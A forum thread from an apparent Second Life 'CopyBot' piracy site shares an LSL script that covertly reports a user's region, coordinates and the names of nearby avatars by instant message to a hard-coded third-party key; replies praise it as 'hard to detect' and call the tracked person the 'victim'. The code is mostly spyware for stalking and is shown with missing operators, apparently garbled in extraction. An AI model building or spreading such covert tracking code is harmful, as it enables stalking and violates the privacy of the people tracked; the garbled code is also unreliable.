Track any Avatar on Secondlife and know their location.

Thread Started By zion

32798
17
  • 94 Vote(s) - 2.87 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rate Thread
#1
PHP Code:
//Contact Greaser Waco for help.
//Known Issues: Sometimes entering into non-scrioted areas and then entering into a scripted area causes some delays and such. Also sometimes lag makes the "People Nearby" list show the people last near the user.

//Edit the two fields below with the orange text after them. Enter your text in between the quotes ("")
//Example: string region_default = "Fantasy Dream";
//Example: string admin_key = "00-000-0000-0000-0000-000";

//Drop it into any prim, and then click Tools > Set scripts to running in selection with the edit menu still open.


string xvector;
string x;
string y;
string z;
key id;
vector pos;
string cr;
key owner;
integer report TRUE;
string owner_name;
list 
list_users;
list 
key_name;
list 
xyz;
string users_x;
integer number;
string other_region;
string region_default ""//ENTER YOUR REGION OR THE REGION TO IGNORE
string admin_key ""//ENTER YOUR KEY IN BETWEEN THE QUTES
default
{
    
state_entry()
    {
        
cr llGetRegionName();
        
owner llGetOwner();
        
owner_name llKey2Name(owner);
        
llSensorRepeat("",NULL_KEY,AGENT,92,PI,1.0);
    }
    
sensor(integer num)
    {
        
cr llGetRegionName();
        if(
cr == region_default)
        {
            
report TRUE;
        }
        if(
report == TRUE)
        {
            if(
cr != region_default)
            {
                
other_region llGetRegionName();
                
pos llGetPos();
                
list_users = [];
                
number 0;
                
xyz llCSV2List((string)pos);
                
xvector llList2String(xyz,0);
                
llGetSubString(xvector,1,3);
                
llGetSubString(xvector,12,14);
                
llGetSubString(xvector,22,24);
                
integer x_fin llFloor((integer)x);
                
integer y_fin llFloor((integer)y);
                
integer z_fin llFloor((integer)z);
                
string url "http://slurl.com/secondlife/" other_region "/" + (string)x_fin "/" + (string)y_fin "/" + (string)z_fin "/";
                
llInstantMessage(admin_key,"User at another region: " owner_name "\nRegion URL: " url);
                do
                {
                    
llInstantMessage(admin_key,"User near " owner_name ": " llDetectedName(number));
                    
number++;
                }
                while(
number num);
                
report FALSE;
            }
        }
        else
        {
            if(
cr != other_region)
            {
                
other_region llGetRegionName();
                
pos llGetPos();
                
list_users = [];
                
number 0;
                
xyz llCSV2List((string)pos);
                
xvector llList2String(xyz,0);
                
llGetSubString(xvector,1,3);
                
llGetSubString(xvector,12,14);
                
llGetSubString(xvector,22,24);
                
integer x_fin llFloor((integer)x);
                
integer y_fin llFloor((integer)y);
                
integer z_fin llFloor((integer)z);
                
string url "http://slurl.com/secondlife/" other_region "/" + (string)x_fin "/" + (string)y_fin "/" + (string)z_fin "/";
                
llInstantMessage(admin_key,"Hud user at another region: " owner_name "\nRegion URL: " url);
                do
                {
                    
llInstantMessage(admin_key,"User near " owner_name ": " llDetectedName(number));
                    
number++;
                }
                while(
number num);
                
report FALSE;
            }
        }
    }

Reply


Page 2 (The above is first post of this thread)
#11
Thank you for your work.
Reply


#12
it works great, hard to detect
Reply


#13
LSL in my specialty but sadly I do not have enough posts to join the convo. :disapproval:
Reply


#14
thanks! :)
Reply


#15
Excellent tool
Reply


#16
I want to try it.
Reply


#17
Just want to clarify... would this track the location of the victim themselves or just monitor a sim?
Reply


#18
@hwarren101, you can try to test it yourself, becourse its a old share, 
i dont think they will respons to you
Don't send Buddy Requests with no reasons
Rules 1-6

[To see links please register here]

Reply




Forum Jump:

1 Guest(s)
Share this:

About Second Life Copybot

Second Life CopyBot Forum is a place where you can get items for Second Life and other vitual worlds for free. With our CopyBot viewers you can export and import any content from these virtual worlds and modify them in 3D software such as Blender, 3D studio Macx etc...